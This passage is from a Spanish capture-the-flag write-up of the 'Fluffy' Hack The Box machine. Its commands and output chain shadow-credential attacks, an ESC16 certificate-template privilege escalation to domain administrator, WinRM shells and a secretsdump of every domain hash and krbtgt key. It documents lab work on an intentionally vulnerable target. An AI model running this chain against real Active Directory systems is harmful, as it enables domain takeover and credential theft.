[*] Authenticating as 'ldap_svc' with the certificate
[*] Certificate identities:
[*]     No identities found in this certificate
[*] Using principal: 'ldap_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'ldap_svc.ccache'
[*] Wrote credential cache to 'ldap_svc.ccache'
[*] Trying to retrieve NT hash for 'ldap_svc'
[*] Restoring the old Key Credentials for 'ldap_svc'
[*] Successfully restored the old Key Credentials for 'ldap_svc'
[*] NT hash for 'ldap_svc': 22151d74ba3de931a352cba1f9393a37

Finalmente para winrm_svc.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
❯ certipy-ad shadow auto -u p.agila@fluffy.htb -p 'prometheusx-303' -account winrm_svc
Certipy v5.0.0 - by Oliver Lyak (ly4k)

[!] DNS resolution failed: The DNS query name does not exist: FLUFFY.HTB.
[!] Use -debug to print a stacktrace
[*] Targeting user 'winrm_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '8e224404-6043-2547-3758-c02d8e2ae20f'
[*] Adding Key Credential with device ID '8e224404-6043-2547-3758-c02d8e2ae20f' to the Key Credentials for 'winrm_svc'
[*] Successfully added Key Credential with device ID '8e224404-6043-2547-3758-c02d8e2ae20f' to the Key Credentials for 'winrm_svc'
[*] Authenticating as 'winrm_svc' with the certificate
[*] Certificate identities:
[*]     No identities found in this certificate
[*] Using principal: 'winrm_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'winrm_svc.ccache'
[*] Wrote credential cache to 'winrm_svc.ccache'
[*] Trying to retrieve NT hash for 'winrm_svc'
[*] Restoring the old Key Credentials for 'winrm_svc'
[*] Successfully restored the old Key Credentials for 'winrm_svc'
[*] NT hash for 'winrm_svc': 33bd09dcd697600edf6b3a7af4875767

User - winrm_svc

winrm_svc puede acceder por el servicio WinRM, utilizamos el hash con evil-winrm logrando acceder a la maquina y la flag user.txt.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
❯ evil-winrm -i fluffy.htb -u winrm_svc -H 33bd09dcd697600edf6b3a7af4875767
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> whoami
fluffy\winrm_svc
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> dir ../Desktop


    Directory: C:\Users\winrm_svc\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        5/25/2025   8:18 AM             34 user.txt


*Evil-WinRM* PS C:\Users\winrm_svc\Documents> cat ../Desktop/user.txt
14a51cbc5bfc0388a9179b991f265390
*Evil-WinRM* PS C:\Users\winrm_svc\Documents>

Privesc

Utilizando el hash de ca_svc ejecutamos certipy especificando la busqueda de plantillas vulnerables. Se muestra que el Ceritficate Authority es vulnerable a ESC16.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
❯ certipy-ad find -vulnerable -u ca_svc@fluffy.htb -hashes ca0f4f9e9eb8a092addf53bb03fc98c8 -no-pass -dc-ip 10.10.11.69 -ns 10.10.11.69 -target dc01.fluffy.htb -stdout
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 14 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'fluffy-DC01-CA' via RRP
[*] Successfully retrieved CA configuration for 'fluffy-DC01-CA'
[*] Checking web enrollment for CA 'fluffy-DC01-CA' @ 'DC01.fluffy.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : fluffy-DC01-CA
    DNS Name                            : DC01.fluffy.htb
    Certificate Subject                 : CN=fluffy-DC01-CA, DC=fluffy, DC=htb
    Certificate Serial Number           : 3670C4A715B864BB497F7CD72119B6F5
    Certificate Validity Start          : 2025-04-17 16:00:16+00:00
    Certificate Validity End            : 3024-04-17 16:11:16+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Disabled Extensions                 : 1.3.6.1.4.1.311.25.2
    Permissions
      Owner                             : FLUFFY.HTB\Administrators
      Access Rights
        ManageCa                        : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
                                          FLUFFY.HTB\Administrators
        ManageCertificates              : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
                                          FLUFFY.HTB\Administrators
        Enroll                          : FLUFFY.HTB\Cert Publishers
    [!] Vulnerabilities
      ESC16                             : Security Extension is disabled.
    [*] Remarks
      ESC16                             : Other prerequisites may be required for this to be exploitable. See the wiki for more details.
Certificate Templates                   : [!] Could not find any certificate templates

ESC16 Exploit

Realizamos la explotacion de ESC16 iniciando con la verificacion de los requisitos. Se menciona que la cuenta atacante debe de tener permisos GenericWrite sobre la victima, esta ultima debe de tener acceso a cualquier plantilla del CA vulnerable. Esto se cumple ya que winrm_svc o ldap_svc tienen permisos sobre ca_svc quien es el que tiene acceso a la plantilla vulnerable.

Iniciamos la explotacion realizando el cambio del UPN del usuario ca_svc a administrator con las credenciales de winrm_svc.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
❯ certipy-ad account -u winrm_svc@fluffy.htb -hashes 33bd09dcd697600edf6b3a7af4875767 -dc-ip '10.10.11.69' -user 'ca_svc' read
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Reading attributes for 'ca_svc':
    cn                                  : certificate authority service
    distinguishedName                   : CN=certificate authority service,CN=Users,DC=fluffy,DC=htb
    name                                : certificate authority service
    objectSid                           : S-1-5-21-497550768-2797716248-2627064577-1103
    sAMAccountName                      : ca_svc
    servicePrincipalName                : ADCS/ca.fluffy.htb
    userPrincipalName                   : ca_svc@fluffy.htb
    userAccountControl                  : 66048
    whenCreated                         : 2025-04-17T16:07:50+00:00
    whenChanged                         : 2025-05-29T15:03:30+00:00
❯ certipy-ad account -u winrm_svc@fluffy.htb -hashes 33bd09dcd697600edf6b3a7af4875767 -dc-ip '10.10.11.69' -upn 'administrator' -user 'ca_svc' update
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_svc':
    userPrincipalName                   : administrator
[*] Successfully updated 'ca_svc'

Con lo anterior solicitamos un certificado de la plantilla User con ca_svc.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
❯ certipy-ad req -u ca_svc@fluffy.htb -hashes ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip '10.10.11.69' -target 'DC01.fluffy.htb' -ca 'fluffy-DC01-CA' -template 'User'
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 19
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'

Actualizamos nuevamente el UPN del usuario ca_svc a su valor original.

1
2
3
4
5
6
7
❯ certipy-ad account -u winrm_svc@fluffy.htb -hashes 33bd09dcd697600edf6b3a7af4875767 -dc-ip '10.10.11.69' -upn 'ca_svc@fluffy.htb' -user 'ca_svc' update
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_svc':
    userPrincipalName                   : ca_svc@fluffy.htb
[*] Successfully updated 'ca_svc'

Finalmente utilizamos el certificado solicitado para autenticacion logrando obtener el hash de administrator.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
❯ certipy-ad auth -dc-ip '10.10.11.69' -pfx 'administrator.pfx' -username 'administrator' -domain 'fluffy.htb'
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'administrator'
[*] Using principal: 'administrator@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e
❯ Wrote certificate and private key to 'administrator.pfx'

Lista de comandos del ataque a ESC16.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
# check upn of victim user GenericWrite
certipy-ad account -u winrm_svc@fluffy.htb -hashes 33bd09dcd697600edf6b3a7af4875767 -dc-ip '10.10.11.69' -user 'ca_svc' read

# update upn of the victim
certipy-ad account -u winrm_svc@fluffy.htb -hashes 33bd09dcd697600edf6b3a7af4875767 -dc-ip '10.10.11.69' -upn 'administrator' -user 'ca_svc' update

# request certificate as the victim to any template on the CA vulnerable
certipy-ad req -u ca_svc@fluffy.htb -hashes ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip '10.10.11.69' -target 'DC01.fluffy.htb' -ca 'fluffy-DC01-CA' -template 'User'

# revert upn of the victim
certipy-ad account -u winrm_svc@fluffy.htb -hashes 33bd09dcd697600edf6b3a7af4875767 -dc-ip '10.10.11.69' -upn 'ca_svc@fluffy.htb' -user 'ca_svc' update

# authenticate as the victim with the requested template
certipy-ad auth -dc-ip '10.10.11.69' -pfx 'administrator.pfx' -username 'administrator' -domain 'fluffy.htb'

Shell

Utilizamos el hash de administrator por WinRM logrando obtener una shell y la flag root.txt.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
❯ evil-winrm -i fluffy.htb -u administrator -H 8da83a3fa618b6e3a00e93f676c92a6e
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
fluffy\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
d7c989c36f239695ee0649aa6c6e49d2
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Dump Hashes

Realizamos un dump de las hashes con impacket-secretdumps.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
❯ impacket-secretsdump administrator@fluffy.htb -hashes :8da83a3fa618b6e3a00e93f676c92a6e -use-vss
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0xffa5608d6bd2811aaabfd47fbc3d1c37
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
FLUFFY\DC01$:aes256-cts-hmac-sha1-96:34b5e3f67441a6c19509cb966b9e5392e48257ff5058e7a22a4282fe822a5751
FLUFFY\DC01$:aes128-cts-hmac-sha1-96:19a1dd430a92c3568f04814342d8e486
FLUFFY\DC01$:des-cbc-md5:ec13a85edf688a85
FLUFFY\DC01$:plain_password_hex:c051a2b56dd8422b09fcc441e1bfaf0a5f0fe659a1634184e7dd6849da03747cad2050bd71e55da3e979245cb872106b52367ac876380294db669d308655c9f8f72b71ea10b4cc90199e1a059645dad4e77b3b982de60b7a59af8d4261b0077be1890caf3aa7e6290dcbc0c443f81bc6124cdef4e26472b3a5c8bcd8fc666b876709496e61a026559328d19db45819e69695bbafda526692513d2457e98de68b9473b08ed96e1d50b06dc53c6e58a595feebd6568a2a75811a5456336f40ede98c2996a0360a618d492e112a905235641126ad3234d68a920c0cd9439b4bd7203d28a1ad4d2ebdbe484d47836735b4cb
FLUFFY\DC01$:aad3b435b51404eeaad3b435b51404ee:7a9950c26fe9c3cbfe5b9ceaa21c9bfd:::
[*] DefaultPassword 
p.agila:prometheusx-303
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x50f64bc1be95364da6cc33deca194d9b827c4846
dpapi_userkey:0xe410025a604608d81064e274f6eb46cba458ebd5
[*] NL$KM 
 0000   0B 4A EC B4 04 86 59 99  A3 11 64 45 1D F8 EF E0   .J....Y...dE....
 0010   74 E0 BB 5A 07 EA AD B9  63 4D AB 03 B5 0F 69 3D   t..Z....cM....i=
 0020   C5 C2 F8 4E F0 EC EC B6  28 A2 59 AB BA 2B F0 A2   ...N....(.Y..+..
 0030   57 89 D1 62 FA 69 04 2A  31 57 54 5A FB B0 2A 18   W..b.i.*1WTZ..*.
NL$KM:0b4aecb404865999a31164451df8efe074e0bb5a07eaadb9634dab03b50f693dc5c2f84ef0ececb628a259abba2bf0a25789d162fa69042a3157545afbb02a18
[*] Searching for NTDS.dit
[*] Registry says NTDS.dit is at C:\Windows\NTDS\ntds.dit. Calling vssadmin to get a copy. This might take some time
[*] Using smbexec method for remote execution
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 8ca25a3f676741c63bb944b06ded3893
[*] Reading and decrypting hashes from \\fluffy.htb\ADMIN$\Temp\ktuJptUh.tmp 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:7a9950c26fe9c3cbfe5b9ceaa21c9bfd:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9c3442d41139f13bd02f0695d56362b9:::
fluffy.htb\ca_svc:1103:aad3b435b51404eeaad3b435b51404ee:ca0f4f9e9eb8a092addf53bb03fc98c8:::
fluffy.htb\ldap_svc:1104:aad3b435b51404eeaad3b435b51404ee:22151d74ba3de931a352cba1f9393a37:::
fluffy.htb\p.agila:1601:aad3b435b51404eeaad3b435b51404ee:a51fede5012110e9a65bd3f470513867:::
fluffy.htb\winrm_svc:1603:aad3b435b51404eeaad3b435b51404ee:33bd09dcd697600edf6b3a7af4875767:::
fluffy.htb\j.coffey:1605:aad3b435b51404eeaad3b435b51404ee:dff933046fa0943ac993d35a054235e3:::
fluffy.htb\j.fleischman:1606:aad3b435b51404eeaad3b435b51404ee:10842ead8d1d060a2de1394e4b2ea460:::
[*] Kerberos keys from \\fluffy.htb\ADMIN$\Temp\ktuJptUh.tmp 
Administrator:aes256-cts-hmac-sha1-96:d79b7fb71c2fc3c913fb59a3ac7c19c16c6637783c2a3bafe87723e90e99d2d2
Administrator:aes128-cts-hmac-sha1-96:72330cfd187d8ced05afda3d9a9fefea
Administrator:des-cbc-md5:403ec8b9e6b0d031
DC01$:aes256-cts-hmac-sha1-96:34b5e3f67441a6c19509cb966b9e5392e48257ff5058e7a22a4282fe822a5751
DC01$:aes128-cts-hmac-sha1-96:19a1dd430a92c3568f04814342d8e486
DC01$:des-cbc-md5:b94a2fb0ef98614a
krbtgt:aes256-cts-hmac-sha1-96:bce1e1f6f529302071ea37bafc49764526db568a7808a0ed55313eeb86dce183
krbtgt:aes128-cts-hmac-sha1-96:c85fbebccd28b736047f75a96714374b
krbtgt:des-cbc-md5:b558703707f27a62
fluffy.htb\ca_svc:aes256-cts-hmac-sha1-96:8dad02a4db02f3ffb213195a04743c404aed41c128b2953160c4cbe04d71c51b
fluffy.htb\ca_svc:aes128-cts-hmac-sha1-96:0ea0cae5076362a19f909b53d96217eb
fluffy.htb\ca_svc:des-cbc-md5:89c8f802b6dcd3a1
fluffy.htb\ldap_svc:aes256-cts-hmac-sha1-96:f6bf787afe770c155767769caf708f9a38a877da0bf5a248b7f35eacec44395c
fluffy.htb\ldap_svc:aes128-cts-hmac-sha1-96:192716f566e02696ff9bb68eb7b31635
fluffy.htb\ldap_svc:des-cbc-md5:07b93b58ba3b6b58
fluffy.htb\p.agila:aes256-cts-hmac-sha1-96:d406a2be082d99748731aa06db12082be1ba82b785e9034b4c8c9bbee6ea9c81
fluffy.htb\p.agila:aes128-cts-hmac-sha1-96:3432d6e28d562b56b79724e8dd140902
fluffy.htb\p.agila:des-cbc-md5:94974cb649986192
fluffy.htb\winrm_svc:aes256-cts-hmac-sha1-96:d39116a2e57c08e6a11efd0d8bb095057757cbe33ef8071b5a2941ae7ffd6361
fluffy.htb\winrm_svc:aes128-cts-hmac-sha1-96:49f7be01bda911e219aa563d2b8b6c2b
fluffy.htb\winrm_svc:des-cbc-md5:5d7320d6866162bf
fluffy.htb\j.coffey:aes256-cts-hmac-sha1-96:6a75e552c557c6d62998edc7886e71a6c00194fffe5a745551bda945afce7bcc
fluffy.htb\j.coffey:aes128-cts-hmac-sha1-96:4ce6fb38d69657c43b83f77cfa57bbde
fluffy.htb\j.coffey:des-cbc-md5:83b685084f34ea04
fluffy.htb\j.fleischman:aes256-cts-hmac-sha1-96:e63c60e41f7f45687527fb9042d668272b7695c6478d3fa11f4c729fa7349b6b
fluffy.htb\j.fleischman:aes128-cts-hmac-sha1-96:dc9450b2c85e8c35f2be9e9fb9b2bbe1
fluffy.htb\j.fleischman:des-cbc-md5:760e31b00d20cd9e
[*] Cleaning up... 
Share on

Dany Sucuc
WRITTEN BY
sckull